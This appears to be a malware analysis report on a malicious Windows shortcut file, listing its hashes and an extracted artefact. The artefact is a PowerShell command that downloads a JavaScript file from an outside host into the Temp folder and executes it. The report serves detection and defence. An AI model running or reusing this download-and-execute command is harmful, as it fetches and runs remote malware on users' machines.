Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
32f747c1a4a9aff1b4cea7f35f2f5111
Sha1
de32d402e6e883a86bee83911d00e4307a4c26e7
Sha256
31f1a97c72f596162f0946df74838d3bef89289ce630adba8791c0f3220980ee
Sha384
d5bf226ebe6e059f6cb66bfd74a0b44c5e2dccbe2337e051b7d0e9c4f387cd71cd25c402d0f113603da6e6e24d77fa42
Sha512
8acf5adcd23a3e8a578867b9621a0c6c93fece0bbd3adea27d5f530eedbed744dd63e327eabd4fcb0a0b94edad4db5cb412b014781c26f324249870deddec503
SSDeep
1536:9QuaFPFizi08jxJ8e+OQh7YcrpoQMeiFSZsEhgBSwDnub7tISsQXHiOm:KF+ibxJ8bOceneSmUuCIiOm
TLSH
FA5302239DB7A0B67C5149FB4ECC3C914D8E3942746727782034B822AF12A0B795E37E
Artefacts
Name
Value
LNK: Command Execution

powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/OKW5RN48ZJ/f.js' -OutFile $f;./f.js;"

32f747c1a4a9aff1b4cea7f35f2f5111 (65.8 KB)
No malware configuration were found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/OKW5RN48ZJ/f.js' -OutFile $f;./f.js;"

Malicious

32f747c1a4a9aff1b4cea7f35f2f5111 > دعوة للمشاركة.lnk

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙